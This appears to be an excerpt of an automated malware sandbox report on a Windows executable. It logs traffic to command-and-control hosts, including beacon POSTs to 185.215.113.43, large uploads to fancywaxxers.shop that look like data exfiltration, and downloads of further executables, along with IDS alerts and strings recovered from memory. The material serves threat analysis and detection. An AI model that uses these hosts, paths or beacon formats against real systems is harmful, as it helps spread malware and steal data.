Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 32 32 37 37 32 42 32 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B22772B25C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Joe Sandbox View	IP Address: 185.215.113.43 185.215.113.43
Source: Joe Sandbox View	IP Address: 104.21.112.1 104.21.112.1

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49717 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49742 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49713 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49716 -> 104.21.112.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49725 -> 104.21.112.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OCZ4PL09TZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12811Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YKZLOSC2307EF33User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15087Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=GN9DL9BSTQOO2N2JQUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19957Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=3Z6B9YVZ08KHLTIK9OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1226Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=10I2JPD0IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572170Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 82Host: fancywaxxers.shop
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\8WYS1MQTL0QCOHKIPL8.exe

Code function: 5_2_00D5E0C0 recv,recv,recv,recv,

5_2_00D5E0C0

Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16

Source: global traffic

DNS traffic detected: DNS query: fancywaxxers.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fancywaxxers.shop

Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: Dl6wuWiQdg.exe, 00000000.00000002.2304123008.0000000000825000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2316767012.00000000053B9000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2301785939.000000000081C000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeN4
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exeoSP&K
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/mine/random.exet
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeV
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.0000000000812000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000002.2303943645.0000000000817000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2302553170.0000000000814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exeW
Source: skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php%/
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php)/
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php1/
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpE/
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpI/
Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpR
Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpS
Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpa/
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000009.00000002.3374357149.0000000001687000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpn
Source: skotes.exe, 00000009.00000002.3374357149.000000000166E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000009.00000003.3209003950.0000000001676000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Dl6wuWiQdg.exe, 00000000.00000003.2302459604.00000000007FE000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2208865107.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2199166936.00000000007B5000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2214091045.00000000007B5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microh
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Dl6wuWiQdg.exe, 00000000.00000003.2185238206.00000000053F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Dl6wuWiQdg.exe, 00000000.00000003.2157306984.00000000053FB000.00000004.00000800.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2157238039.00000000053FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Dl6wuWiQdg.exe, 00000000.00000003.2196903882.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Dl6wuWiQdg.exe, 00000000.00000003.2196883539.0000000000833000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
